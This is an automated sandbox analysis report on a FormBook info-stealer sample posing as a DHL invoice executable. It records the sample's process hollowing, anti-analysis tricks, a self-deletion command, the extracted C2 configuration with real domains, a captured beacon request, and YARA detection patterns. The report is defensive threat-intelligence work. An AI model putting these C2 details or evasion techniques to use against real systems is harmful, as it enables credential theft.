Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report invoice dhl.delivery document and original invoice sign.exe

Overview

General Information

Sample Name:invoice dhl.delivery document and original invoice sign.exe
Analysis ID:532858
MD5:ebce26da75669d94dbc0550bf394b204
SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
Tags:DHLexeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • invoice dhl.delivery document and original invoice sign.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: EBCE26DA75669D94DBC0550BF394B204)
    • invoice dhl.delivery document and original invoice sign.exe (PID: 6188 cmdline: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe MD5: EBCE26DA75669D94DBC0550BF394B204)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 7092 cmdline: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 7056

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: invoice dhl.delivery document and original invoice sign.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 4x nop then pop ebx3_2_00407B1A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 4x nop then pop edi3_2_0040E460
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx11_2_00707B1B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi11_2_0070E460

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exeDomain query: www.federaldados.design
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cuteprofessionalscrubs.com/9gr5/
          Source: global trafficHTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1Host: www.federaldados.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 44.227.76.166 44.227.76.166
          Source: msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmpString found in binary or memory: http://federaldados.design
          Source: explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.federaldados.design
          Source: global trafficHTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1Host: www.federaldados.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
          Source: initial sampleStatic PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: invoice dhl.delivery document and original invoice sign.exeStatic file information: Suspicious name
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
